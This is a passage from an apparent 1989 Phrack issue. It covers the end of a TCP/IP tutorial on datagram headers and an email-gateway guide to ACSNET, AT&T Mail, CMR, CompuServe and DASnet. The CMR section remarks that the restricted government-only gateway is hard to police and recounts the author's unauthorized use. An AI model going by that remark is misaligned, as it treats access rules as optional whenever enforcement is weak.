  754. - The protocols needed to manage a specific physical medium, such
  755.   as Ethernet or a point to point line.
  756.  
  757. TCP/IP is based on the "catenet model."  (This is described in
  758. more detail in IEN 48.)  This model assumes that there are a
  759. large number of independent networks connected together by
  760. gateways.  The user should be able to access computers or other
  761. resources on any of these networks.  Datagrams will often pass
  762. through a dozen different networks before getting to their final
  763. destination.  The routing needed to accomplish this should be
  764. completely invisible to the user.  As far as the user is
  765. concerned, all he needs to know in order to access another system
  766. is an "Internet address."  This is an address that looks like
  767. 128.6.4.194.  It is actually a 32-bit number.  However it is
  768. normally written as 4 decimal numbers, each representing 8 bits
  769. of the address.  (The term "octet" is used by Internet
  770. documentation for such 8-bit chunks.  The term "byte" is not
  771. used, because TCP/IP is supported by some computers that have
  772. byte sizes other than 8 bits.)
  773.  
  774. Generally the structure of the address gives you some information
  775. about how to get to the system.  For example, 128.6 is a network
  776. number assigned by a central authority to Rutgers University.
  777. Rutgers uses the next octet to indicate which of the campus
  778. Ethernets is involved.  128.6.4 happens to be an Ethernet used by
  779. the Computer Science Department. The last octet allows for up to
  780. 254 systems on each Ethernet.  (It is 254 because 0 and 255 are
  781. not allowed, for reasons that will be discussed later.)  Note
  782. that 128.6.4.194 and 128.6.5.194 would be different systems.  The
  783. structure of an Internet address is described in a bit more
  784. detail later.
  785.  
  786. Of course I normally refer to systems by name, rather than by
  787. Internet address.  When I specify a name, the network software
  788. looks it up in a database, and comes up with the corresponding
  789. Internet address.  Most of the network software deals strictly in
  790. terms of the address.  (RFC 882 describes the name server
  791. technology used to handle this lookup.)
  792.  
  793. TCP/IP is built on "connectionless" technology.  Information is
  794. transfered as a sequence of "datagrams."  A datagram is a
  795. collection of data that is sent as a single message.  Each of
  796. these datagrams is sent through the network individually.  There
  797. are provisions to open connections (i.e. to start a conversation
  798. that will continue for some time).  However at some level,
  799. information from those connections is broken up into datagrams,
  800. and those datagrams are treated by the network as completely
  801. separate.  For example, suppose you want to transfer a 15000
  802. octet file.  Most networks can't handle a 15000 octet datagram.
  803. So the protocols will break this up into something like 30
  804. 500-octet datagrams.  Each of these datagrams will be sent to the
  805. other end.  At that point, they will be put back together into
  806. the 15000-octet file.  However while those datagrams are in
  807. transit, the network doesn't know that there is any connection
  808. between them.  It is perfectly possible that datagram 14 will
  809. actually arrive before datagram 13.  It is also possible that
  810. somewhere in the network, an error will occur, and some datagram
  811. won't get through at all.  In that case, that datagram has to be
  812. sent again.
  813.  
  814. Note by the way that the terms "datagram" and "packet" often seem
  815. to be nearly interchangable.  Technically, datagram is the right
  816. word to use when describing TCP/IP.  A datagram is a unit of
  817. data, which is what the protocols deal with.  A packet is a
  818. physical thing, appearing on an Ethernet or some wire.  In most
  819. cases a packet simply contains a datagram, so there is very
  820. little difference.  However they can differ.  When TCP/IP is used
  821. on top of X.25, the X.25 interface breaks the datagrams up into
  822. 128-byte packets.  This is invisible to IP, because the packets
  823. are put back together into a single datagram at the other end
  824. before being processed by TCP/IP.  So in this case, one IP
  825. datagram would be carried by several packets.  However with most
  826. media, there are efficiency advantages to sending one datagram
  827. per packet, and so the distinction tends to vanish.
  828.  
  829.  
  830. * The TCP level
  831.  
  832. Two separate protocols are involved in handling TCP/IP datagrams.
  833. TCP (the "transmission control protocol") is responsible for
  834. breaking up the message into datagrams, reassembling them at the
  835. other end, resending anything that gets lost, and putting things
  836. back in the right order.  IP (the "internet protocol") is
  837. responsible for routing individual datagrams.  It may seem like
  838. TCP is doing all the work.  However in the Internet, simply
  839. getting a datagram to its destination can be a complex job.  A
  840. connection may require the datagram to go through several
  841. networks at Rutgers, a serial line to the John von Neuman
  842. Supercomputer Center, a couple of Ethernets there, a series of
  843. 56Kbaud phone lines to another NSFnet site, and more Ethernets on
  844. another campus.  Keeping track of the routes to all of the
  845. destinations and handling incompatibilities among different
  846. transport media turns out to be a complex job.  Note that the
  847. interface between TCP and IP is fairly simple.  TCP simply hands
  848. IP a datagram with a destination.  IP doesn't know how this
  849. datagram relates to any datagram before it or after it.
  850.  
  851. It may have occurred to you that something is missing here.  I
  852. have talked about Internet addresses, but not about how you keep
  853. track of multiple connections to a given system.  Clearly it
  854. isn't enough to get a datagram to the right destination.  TCP has
  855. to know which connection this datagram is part of.  This task is
  856. referred to as "demultiplexing."  In fact, there are several
  857. levels of demultiplexing going on in TCP/IP.  The information
  858. needed to do this demultiplexing is contained in a series of
  859. "headers."  A header is simply a few extra octets tacked onto the
  860. beginning of a datagram by some protocol in order to keep track
  861. of it.  It's a lot like putting a letter into an envelope and
  862. putting an address on the outside of the envelope.  Except with
  863. modern networks it happens several times.  It's like you put the
  864. letter into a little envelope, your secretary puts that into a
  865. somewhat bigger envelope, the campus mail center puts that
  866. envelope into a still bigger one, etc.  Here is an overview of
  867. the headers that get stuck on a message that passes through a
  868. typical TCP/IP network:
  869.  
  870. It starts with a single data stream, say a file you are trying to
  871. send to some other computer:
  872.  
  873.      ......................................................
  874.  
  875. TCP breaks it up into manageable chunks.  (In order to do this,
  876. TCP has to know how large a datagram your network can handle.
  877. Actually, the TCP's at each end say how big a datagram they can
  878. handle, and then they pick the smallest size.)
  879.  
  880.      .... .... .... .... .... .... .... ....
  881.  
  882. TCP puts a header at the front of each datagram.  This header
  883. actually contains at least 20 octets, but the most important ones
  884. are a source and destination "port number" and a "sequence
  885. number."  The port numbers are used to keep track of different
  886. conversations.  Suppose 3 different people are transferring
  887. files.  Your TCP might allocate port numbers 1000, 1001, and 1002
  888. to these transfers.  When you are sending a datagram, this
  889. becomes the "source" port number, since you are the source of the
  890. datagram.  Of course the TCP at the other end has assigned a port
  891. number of its own for the conversation.  Your TCP has to know the
  892. port number used by the other end as well.  (It finds out when
  893. the connection starts, as I will explain below.)  It puts this in
  894. the "destination" port field.  Of course if the other end sends a
  895. datagram back to you, the source and destination port numbers
  896. will be reversed, since then it will be the source and you will
  897. be the destination.  Each datagram has a sequence number.  This
  898. is used so that the other end can make sure that it gets the
  899. datagrams in the right order, and that it hasn't missed any.
  900. (See the TCP specification for details.)  TCP doesn't number the
  901. datagrams, but the octets.  So if there are 500 octets of data in
  902. each datagram, the first datagram might be numbered 0, the second
  903. 500, the next 1000, the next 1500, etc.  Finally, I will mention
  904. the Checksum.  This is a number that is computed by adding up all
  905. the octets in the datagram (more or less - see the TCP spec).
  906. The result is put in the header.  TCP at the other end computes
  907. the checksum again.  If they disagree, then something bad
  908. happened to the datagram in transmission, and it is thrown away.
  909. So here's what the datagram looks like now.
  910.  
  911.        +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  912.        |          Source Port           |       Destination Port       |
  913.        +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  914.        |                         Sequence Number                       |
  915.        +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  916.        |                      Acknowledgment Number                    |
  917.        +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  918.        |  Data |           |U|A|P|R|S|F|                               |
  919.        | Offset| Reserved  |R|C|S|S|Y|I|            Window             |
  920.        |       |           |G|K|H|T|N|N|                               |
  921.        +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  922.        |           Checksum            |         Urgent Pointer        |
  923.        +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  924.        |   your data ... next 500 octets                               |
  925.        |   ......                                                      |
  926.  
  927. If you abbreviate the TCP header as "T", the whole file now looks like this:
  928.  
  929.      T.... T.... T.... T.... T.... T.... T....
  930.  
  931. You will note that there are items in the header that I have not
  932. described above.  They are generally involved with managing the
  933. connection.  In order to make sure the datagram has arrived at
  934. its destination, the recipient has to send back an
  935. "acknowledgement."  This is a datagram whose "Acknowledgement
  936. number" field is filled in.  For example, sending a packet with
  937. an acknowledgement of 1500 indicates that you have received all
  938. the data up to octet number 1500.  If the sender doesn't get an
  939. acknowledgement within a reasonable amount of time, it sends the
  940. data again.  The window is used to control how much data can be
  941. in transit at any one time.  It is not practical to wait for each
  942. datagram to be acknowledged before sending the next one.  That
  943. would slow things down too much.  On the other hand, you can't
  944. just keep sending, or a fast computer might overrun the capacity
  945. of a slow one to absorb data.  Thus each end indicates how much
  946. new data it is currently prepared to absorb by putting the number
  947. of octets in its "Window" field.  As the computer receives data,
  948. the amount of space left in its window decreases.  When it goes
  949. to zero, the sender has to stop.  As the receiver processes the
  950. data, it increases its window, indicating that it is ready to
  951. accept more data. Often the same datagram can be used to
  952. acknowledge receipt of a set of data and to give permission for
  953. additional new data (by an updated window).  The "Urgent" field
  954. allows one end to tell the other to skip ahead in its processing
  955. to a particular octet.  This is often useful for handling
  956. asynchronous events, for example when you type a control
  957. character or other command that interrupts output.  The other
  958. fields are not pertinent to understanding what I am trying to
  959. explain in this article.
  960.  
  961.  
  962. * The IP Level
  963.  
  964. TCP sends each datagram to IP.  Of course it has to tell IP the
  965. Internet address of the computer at the other end.  Note that
  966. this is all IP is concerned about.  It doesn't care about what is
  967. in the datagram, or even in the TCP header.  IP's job is simply
  968. to find a route for the datagram and get it to the other end.  In
  969. order to allow gateways or other intermediate systems to forward
  970. the datagram, it adds its own header.  The main things in this
  971. header are the source and destination Internet address (32-bit
  972. addresses, like 128.6.4.194), the protocol number, and another
  973. checksum.  The source Internet address is simply the address of
  974. your machine.  (This is necessary so the other end knows where
  975. the datagram came from.)  The destination Internet address is the
  976. address of the other machine.  (This is necessary so any gateways
  977. in the middle know where you want the datagram to go.)  The
  978. protocol number tells IP at the other end to send the datagram to
  979. TCP.
  980.  
  981. Although most IP traffic uses TCP, there are other protocols that
  982. can use IP, so you have to tell IP which protocol to send the
  983. datagram to.  Finally, the checksum allows IP at the other end to
  984. verify that the header wasn't damaged in transit.  Note that TCP
  985. and IP have separate checksums.  IP needs to be able to verify
  986. that the header didn't get damaged in transit, or it could send a
  987. message to the wrong place.  It is both more efficient and safer
  988. to have TCP compute a separate checksum for the TCP header and
  989. data.  Once IP has tacked on its header, here's what the message
  990. looks like:
  991.  
  992.       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  993.       |Version|  IHL  |Type of Service|          Total Length         |
  994.       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  995.       |         Identification        |Flags|      Fragment Offset    |
  996.       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  997.       |  Time to Live |    Protocol   |         Header Checksum       |
  998.       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  999.       |                       Source Address                          |
  1000.       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  1001.       |                    Destination Address                        |
  1002.       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  1003.       |  TCP header, then your data ......                            |
  1004.       |                                                               |
  1005.  
  1006. If you represent the IP header by an "I", your file now looks like this:
  1007.  
  1008.      IT....   IT....   IT....   IT....   IT....   IT....   IT....
  1009.  
  1010. Again, the header contains some additional fields that will not
  1011. be discussed in this article because they are not relevent to
  1012. understanding the process.  The flags and fragment offset are
  1013. used to keep track of the pieces when a datagram has to be split
  1014. up.  This can happen when datagrams are forwarded through a
  1015. network for which they are too big.  (This will be discussed a
  1016. bit more below.) The time to live is a number that is decremented
  1017. whenever the datagram passes through a system.  When it goes to
  1018. zero, the datagram is discarded.  This is done in case a loop
  1019. develops in the system somehow.  Of course this should be
  1020. impossible, but well-designed networks are built to cope with
  1021. "impossible" conditions.
  1022.  
  1023. At this point, it's possible that no more headers are needed.  If
  1024. your computer happens to have a direct phone line connecting it
  1025. to the destination computer, or to a gateway, it may simply send
  1026. the datagrams out on the line (though likely a synchronous
  1027. protocol such as HDLC would be used, and it would add at least a
  1028. few octets at the beginning and end).
  1029.  
  1030.  
  1031. * The Ethernet Level
  1032.  
  1033. Most networks these days use Ethernet which has its own
  1034. addresses.  The people who designed Ethernet wanted to make sure
  1035. that no two machines would end up with the same Ethernet address.
  1036. Furthermore, they didn't want the user to have to worry about
  1037. assigning addresses.  So each Ethernet controller comes with an
  1038. address built-in from the factory.  In order to make sure that
  1039. they would never have to reuse addresses, the Ethernet designers
  1040. allocated 48 bits for the Ethernet address.  People who make
  1041. Ethernet equipment have to register with a central authority, to
  1042. make sure that the numbers they assign don't overlap any other
  1043. manufacturer.  Ethernet is a "broadcast medium."  That is, it is
  1044. in effect like an old party line telephone.  When you send a
  1045. packet out on the Ethernet, every machine on the network sees the
  1046. packet.  So something is needed to make sure that the right
  1047. machine gets it.  As you might guess, this involves the Ethernet
  1048. header.
  1049.  
  1050. Every Ethernet packet has a 14-octet header that includes the
  1051. source and destination Ethernet address, and a type code.  Each
  1052. machine is supposed to pay attention only to packets with its own
  1053. Ethernet address in the destination field.  (It's perfectly
  1054. possible to cheat, which is one reason that Ethernet
  1055. communications are not terribly secure.)  Note that there is no
  1056. connection between the Ethernet address and the Internet address.
  1057. Each machine has to have a table of what Ethernet address
  1058. corresponds to what Internet address.  (I will describe how this
  1059. table is constructed a bit later.)  In addition to the addresses,
  1060. the header contains a type code.  The type code is to allow for
  1061. several different protocol families to be used on the same
  1062. network.  So you can use TCP/IP, DECnet, Xerox NS, etc. at the
  1063. same time. Each of them will put a different value in the type
  1064. field.  Finally, there is a checksum.  The Ethernet controller
  1065. computes a checksum of the entire packet.  When the other end
  1066. receives the packet, it recomputes the checksum, and throws the
  1067. packet away if the answer disagrees with the original.  The
  1068. checksum is put on the end of the packet, not in the header.  The
  1069. final result is that your message looks like this:
  1070.  
  1071.       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  1072.       |       Ethernet destination address (first 32 bits)            |
  1073.       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  1074.       | Ethernet dest (last 16 bits)  |Ethernet source (first 16 bits)|
  1075.       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  1076.       |       Ethernet source address (last 32 bits)                  |
  1077.       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  1078.       |        Type code              |
  1079.       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  1080.       |  IP header, then TCP header, then your data                   |
  1081.       |                                                               |
  1082.           ...
  1083.       |                                                               |
  1084.       |   end of your data                                            |
  1085.       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  1086.       |                       Ethernet Checksum                       |
  1087.       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  1088.  
  1089. If you represent the Ethernet header with "E", and the Ethernet
  1090. checksum with "C", your file now looks like this:
  1091.  
  1092.      EIT....C   EIT....C   EIT....C   EIT....C   EIT....C
  1093.  
  1094. When these packets are received by the other end, of course all
  1095. the headers are removed.  The Ethernet interface removes the
  1096. Ethernet header and the checksum.  It looks at the type code.
  1097. Since the type code is the one assigned to IP, the Ethernet
  1098. device driver passes the datagram up to IP.  IP removes the IP
  1099. header.  It looks at the IP protocol field.  Since the protocol
  1100. type is TCP, it passes the datagram up to TCP.  TCP now looks at
  1101. the sequence number.  It uses the sequence numbers and other
  1102. information to combine all the datagrams into the original file.
  1103.  
  1104. This ends my initial summary of TCP/IP.  There are still some
  1105. crucial concepts I have not gotten to, so in part two, I will go
  1106. back and add details in several areas.  (For detailed
  1107. descriptions of the items discussed here see, RFC 793 for TCP,
  1108. RFC 791 for IP, and RFC's 894 and 826 for sending IP over
  1109. Ethernet.)
  1110. __________________________________________________________________
  1111.  
  1112.                                 ==Phrack Inc.==
  1113.  
  1114.                      Volume Three, Issue 28, File #4 of 12
  1115.  
  1116.                               Network Miscellany
  1117.                               ~~~~~~~~~~~~~~~~~~
  1118.                                  by Taran King
  1119.  
  1120.                                  June 1, 1989
  1121.  
  1122.  
  1123. ACSNET
  1124. ~~~~~~
  1125. Australian Computer Science Network (ACSNET), also known as Oz,
  1126. has its gateway through the CSNET node munnari.oz.au and if you
  1127. cannot directly mail to the .oz.au domain, try either
  1128. username%munnari.oz.au@UUNET.UU.NET or
  1129. munnari!username@UUNET.UU.NET.
  1130.  
  1131. AT&T MAIL
  1132. ~~~~~~~~~
  1133. AT&T Mail is a mailing service of AT&T, probably what you might
  1134. call it's MCI-Mail equivalent.  It is available on the UUCP
  1135. network as node name attmail but I've had problems having mail
  1136. get through.  Apparently, it does cost money to mail to this
  1137. service and the surrounding nodes are not willing to pick up the
  1138. tab for the ingoing mail, or at least, this has seemingly been
  1139. the case thus far.  I believe, though, that perhaps routing to
  1140. att!attmail!user would work.
  1141.  
  1142. AT&T recently announced six new X.400 interconnections between
  1143. AT&T Mail and electronic mail services in the U.S., Korea,
  1144. Sweden, Australia, and Finland.  In the U.S., AT&T Mail is now
  1145. interconnected with Telenet Communications Corporation's service,
  1146. Telemail, allowing users of both services to exchange messages
  1147. easily.  With the addition of these interconnections, the AT&T
  1148. Mail Gateway 400 Service allows AT&T Mail subscribers to exchange
  1149. messages with users of the following electronic messaging
  1150. systems:
  1151.  
  1152. Company                    E-Mail Name*            Country
  1153. -------                    ------------            -------
  1154. TeleDelta                  TeDe 400                Sweden
  1155. OTC                        MPS400                  Australia
  1156. Telecom-Canada             Envoy100                Canada
  1157. DACOM                      DACOM MHS               Korea
  1158. P&T-Tele                   MailNet 400             Finland
  1159. Helsinki Telephone Co.     ELISA                   Finland
  1160. Dialcom                    Dialcom                 USA
  1161. Telenet                    Telemail                USA
  1162. KDD                        Messavia                Japan
  1163. Transpac                   ATLAS400                France
  1164.  
  1165. The interconnections are based on the X.400 standard, a set of
  1166. guidelines for the format, delivery and receipt of electronic
  1167. messages recommended by an international standards committee the
  1168. CCITT.  International X.400 messages incur a surcharge.  They
  1169. are:
  1170.  
  1171.                  To Canada:
  1172.                     Per note:            $.05
  1173.                     Per message unit:    $.10
  1174.  
  1175.                  To other international locations:
  1176.                     Per note:            $.20
  1177.                     Per message unit:    $.50
  1178.  
  1179. There is no surcharge for X.400 messages within the U.S.  The
  1180. following are contacts to speak with about mailing through these
  1181. mentioned networks.  Other questions can be directed through AT&T
  1182. Mail's toll-free number, 1-800-624-5672.
  1183.  
  1184. MHS Gateway:  mhs!atlas                     MHS Gateway:  mhs!dacom
  1185. Administrator:  Bernard Tardieu             Administrator:  Bob Nicholson
  1186. Transpac                                    AT&T
  1187. Phone:  3399283203                          Morristown, NJ  07960
  1188. Phone:  +1 201 644 1838
  1189.  
  1190. MHS Gateway:  mhs!dialcom                   MHS Gateway:  mhs!elisa
  1191. Administrator:  Mr. Laraman                 Administrator:  Ulla Karajalainen
  1192. Dialcom                                     Nokia Data
  1193. South Plainfield, NJ  07080                 Phone:  01135804371
  1194. Phone:  +1 441 493 3843
  1195.  
  1196. MHS Gateway:  mhs!envoy                     MHS Gateway:  mhs!kdd
  1197. Administrator:  Kin C. Ma                   Administrator:  Shigeo Lwase
  1198. Telecom Canada                              Kokusai Denshin Denwa CO.
  1199. Phone:  +1 613 567 7584                     Phone:  8133477419
  1200.  
  1201. MHS Gateway:  mhs!mailnet                   MHS Gateway:  mhs!otc
  1202. Administrator:  Kari Aakala                 Administrator:  Gary W. Krumbine
  1203. Gen Directorate Of Post &                   AT&T Information Systems
  1204. Phone:  35806921730                         Lincroft, NJ  07738
  1205.                                             Phone:  +1 201 576 2658
  1206.  
  1207. MHS Gateway:  mhs!telemail                  MHS Gateway:  mhs
  1208. Administrator:  Jim Kelsay                  Administrator:  AT&T Mail MHS
  1209. GTE Telenet Comm Corp                                       Gateway
  1210. Reston, VA  22096                           AT&T
  1211. Phone:  +1 703 689 6034                     Lincroft, NJ  08838
  1212.                                             Phone:  +1 800 624 5672
  1213.  
  1214. CMR
  1215. ~~~
  1216. Previously known as Intermail, the Commercial Mail Relay (CMR)
  1217. Service is a mail relay service between the Internet and three
  1218. commercial electronic mail systems:  US Sprint/Telenet, MCI-Mail,
  1219. and DIALCOM systems (i.e. Compmail, NSFMAIL, and USDA-MAIL).
  1220.  
  1221. An important note:  The only requirement for using this mail
  1222. gateway is that the work conducted must be DARPA sponsored
  1223. research and other approved government business.  Basically, this
  1224. means that unless you've got some government-related business,
  1225. you're not supposed to be using this gateway.  Regardless, it
  1226. would be very difficult for them to screen everything that goes
  1227. through their gateway.  Before I understood the requirements of
  1228. this gateway, I was sending to a user of MCI-Mail and was not
  1229. contacted about any problems with that communication.
  1230. Unfortunately, I mistyped the MCI-Mail address on one of the
  1231. letters and that letter ended up getting read by system
  1232. administrators who then informed me that I was not to be using
  1233. that system, as well as the fact that they would like to bill me
  1234. for using it.  That was an interesting thought on their part
  1235. anyway, but do note that using this service does incur charges.
  1236.  
  1237. The CMR mailbox address in each system corresponds to the label:
  1238.  
  1239.           Telemail:  [Intermail/USCISI]TELEMAIL/USA
  1240.           MCI-Mail:  Intermail      or      107-8239
  1241.           CompMail:  Intermail      or      CMP0817
  1242.           NSF-Mail:  Intermail      or      NSF153
  1243.          USDA-Mail:  Intermail      or      AGS9999
  1244.  
  1245. Addressing examples for each e-mail system are as follows:
  1246.  
  1247. MCIMAIL:
  1248.    123-4567             seven digit address
  1249.    Everett T. Bowens    person's name (must be unique!)
  1250.  
  1251. COMPMAIL:
  1252.    CMP0123              three letters followed by three or four digits
  1253.    S.Cooper             initial, then "." and then last name
  1254.    134:CMP0123          domain, then ":" and then combination system and
  1255.                         account number
  1256.  
  1257. NSFMAIL:
  1258.    NSF0123              three letters followed by three or four digits
  1259.    A.Phillips           initial, then "." and then last name
  1260.    157:NSF0123          domain, then ":" and then combination system and
  1261.                          account number
  1262.  
  1263. USDAMAIL:
  1264.    AGS0123              three letters followed by three or four digits
  1265.    P.Shifter            initial, then "." and then last name
  1266.    157:AGS0123          domain, then ":" and then combination system and
  1267.                          account number
  1268.  
  1269. TELEMAIL:
  1270.    BARNOC               user (directly on Telemail)
  1271.    BARNOC/LODH          user/organization (directly on Telemail)
  1272.    [BARNOC/LODH]TELEMAIL/USA
  1273.                          [user/organization]system branch/country
  1274.  
  1275. The following are other Telenet system branches/countries that
  1276. can be mailed to:
  1277.  
  1278. TELEMAIL/USA     NASAMAIL/USA     MAIL/USA            TELEMEMO/AUSTRALIA
  1279. TELECOM/CANADA   TOMMAIL/CHILE    TMAILUK/GB          ITALMAIL/ITALY
  1280. ATI/JAPAN        PIPMAIL/ROC      DGC/USA             FAAMAIL/USA
  1281. GSFC/USA         GTEMAIL/USA      TM11/USA            TNET.TELEMAIL/USA
  1282. USDA/USA
  1283.  
  1284.      Note:  OMNET's ScienceNet is on the Telenet system MAIL/USA and to mail to
  1285. it, the format would be [A.MAILBOX/OMNET]MAIL/USA.  The following are available
  1286. subdivisions of OMNET:
  1287.  
  1288.          AIR     Atmospheric Sciences
  1289.          EARTH   Solid Earth Sciences
  1290.          LIFE    Life Sciences
  1291.          OCEAN   Ocean Sciences
  1292.          POLAR   Interdisciplinary Polar Studies
  1293.          SPACE   Space Science and Remote Sensing
  1294.  
  1295. The following is a list of DIALCOM systems available in the
  1296. listed countries with their domain and system numbers:
  1297.  
  1298. Service Name            Country             Domain Number    System Number
  1299. ~~~~~~~~~~~~            ~~~~~~~             ~~~~~~~~~~~~~    ~~~~~~~~~~~~~
  1300. Keylink-Dialcom         Australia           60               07, 08, 09
  1301. Dialcom                 Canada              20               20, 21, 22, 23, 24
  1302. DPT Databoks            Denmark             124              71
  1303. Telebox                 Finland             127              62
  1304. Telebox                 West Germany        30               15, 16
  1305. Dialcom                 Hong Kong           80               88, 89
  1306. Eirmail                 Ireland             100              74
  1307. Goldnet                 Israel              50               05, 06
  1308. Mastermail              Italy               130              65, 67
  1309. Mastermail              Italy               1                66, 68
  1310. Dialcom                 Japan               70               13, 14
  1311. Dialcom                 Korea               1                52
  1312. Telecom Gold            Malta               100              75
  1313. Dialcom                 Mexico              1                52
  1314. Memocom                 Netherlands         124              27, 28, 29
  1315. Memocom                 Netherlands         1                55
  1316. Starnet                 New Zealand         64               01, 02
  1317. Dialcom                 Puerto Rico         58               25
  1318. Telebox                 Singapore           88               10, 11, 12
  1319. Dialcom                 Taiwan              1                52
  1320. Telecom Gold            United Kingdom      100              01, 04, 17,
  1321. 80-89
  1322. DIALCOM                 USA                 1                29, 30, 31, 32,
  1323.                                                              33, 34, 37, 38,
  1324.                                                              41-59, 61, 62, 63,
  1325.                                                              90-99
  1326.  
  1327.  NOTE:  You can also mail to username@NASAMAIL.NASA.GOV or
  1328.         username@GSFCMAIL.NASA.GOV instead of going through the CMR gateway to
  1329.         mail to NASAMAIL or GSFCMAIL.
  1330.  
  1331. For more information and instructions on how to use CMR, send a
  1332. message to the user support group at
  1333. intermail-request@intermail.isi.edu (you'll get basically what
  1334. I've listed plus maybe a bit more).  Please read Chapter 3 of The
  1335. Future Transcendent Saga (Limbo to Infinity) for specifics on
  1336. mailing to these destination mailing systems.
  1337.  
  1338. COMPUSERVE
  1339. ~~~~~~~~~~
  1340. CompuServe is well known for its games and conferences.  It does, though, have
  1341. mailing capability.  Now, they have developed their own Internet domain, called
  1342. COMPUSERVE.COM.  It is relatively new and mail can be routed through either
  1343. TUT.CIS.OHIO-STATE.EDU or NORTHWESTERN.ARPA.
  1344.  
  1345. Example: user%COMPUSERVE.COM@TUT.CIS.OHIO-STATE.EDU or replace
  1346.          TUT.CIS.OHIO-STATE.EDU with NORTHWESTERN.ARPA).
  1347.  
  1348. The CompuServe link appears to be a polled UUCP connection at the
  1349. gateway machine.  It is actually managed via a set of shell
  1350. scripts and a comm utility called xcomm, which operates via
  1351. command scripts built on the fly by the shell scripts during
  1352. analysis of what jobs exist to go into and out of CompuServe.
  1353.  
  1354. CompuServe subscriber accounts of the form 7xxxx,yyyy can be
  1355. addressed as 7xxxx.yyyy@compuserve.com.  CompuServe employees can
  1356. be addressed by their usernames in the csi.compuserve.com
  1357. subdomain.  CIS subscribers write mail to
  1358. ">inet:user@host.domain" to mail to users on the Wide-Area
  1359. Networks, where ">gateway:" is CompuServe's internal gateway
  1360. access syntax.  The gateway generates fully-RFC-compliant
  1361. headers.
  1362.  
  1363. To fully extrapolate -- from the CompuServe side, you would use
  1364. their EasyPlex mail system to send mail to someone in BITNET or
  1365. the Internet.   For example, to send me mail at my Bitnet id, you
  1366. would address it to:
  1367.  
  1368.             INET:C488869%UMCVMB.BITNET@CUNYVM.CUNY.EDU
  1369.  
  1370. Or to my Internet id:
  1371.  
  1372.             INET:C488869@UMCVMB.MISSOURI.EDU
  1373.  
  1374. Now, if you have a BITNET to Internet userid, this is a silly
  1375. thing to do, since your connect time to CompuServe costs you
  1376. money.  However, you can use this information to let people on
  1377. CompuServe contact YOU.  CompuServe Customer Service says that
  1378. there is no charge to either receive or send a message to the
  1379. Internet or BITNET.
  1380.  
  1381. DASNET
  1382. ~~~~~~
  1383. DASnet is a smaller network that connects to the Wide-Area
  1384. Networks but charges for their service.  DASnet subscribers get
  1385. charged for both mail to users on other networks AND mail for
  1386. them from users of other networks.  The following is a brief
  1387. description of DASnet, some of which was taken from their
  1388. promotional text letter.
  1389.  
  1390. DASnet allows you to exchange electronic mail with people on more
  1391. than 20 systems and networks that are interconnected with DASnet.
  1392. One of the drawbacks, though, is that, after being subscribed to
  1393. these services, you must then subscribe to DASnet, which is a
  1394. separate cost.  Members of Wide-Area networks can subscribe to
  1395. DASnet too.  Some of the networks and systems reachable through
  1396. DASnet include the following:
  1397.  
  1398.      ABA/net, ATT Mail, BIX (Byte Information eXchange), DASnet Network,
  1399.      Dialcom, EIES, EasyLink, Envoy 100, FAX, GeoMail, INET, MCI Mail, NWI,
  1400.      PeaceNet/EcoNet, Portal Communications, The Meta Network, The Source,
  1401.      Telemail, ATI's Telemail (Japan), Telex, TWICS (Japan), UNISON, UUCP, The
  1402.      WELL, and Domains (i.e. ".COM" and ".EDU" etc.).  New systems are added
  1403.      all of the time.  As of the writing of this file, Connect, GoverNET,
  1404.      MacNET, and The American Institute of Physics PI-MAIL are soon to be
  1405.      connected.
  1406.  
  1407. You can get various accounts on DASnet including:
  1408.  
  1409.   o  Corporate Accounts -- If your organization wants more than one individual
  1410.                            subscription.
  1411.   o  Site Subscriptions -- If you want DASnet to link directly to your
  1412.                            organization's electronic mail system.
  1413.  
  1414. To send e-mail through DASnet, you send the message to the DASnet
  1415. account on your home system.  You receive e-mail at your mailbox,
  1416. as you do now.  On the Wide-Area Networks, you send mail to
  1417. XB.DAS@STANFORD.BITNET.  On the Subject:  line, you type the
  1418. DASnet address in brackets and then the username just outside of
  1419. them.  The real subject can be expressed after the username
  1420. separated by a "!"  (Example:  Subject:  [0756TK]randy!How's
  1421. Phrack?).
  1422.  
  1423. The only disadvantage of using DASnet as opposed to Wide-Area
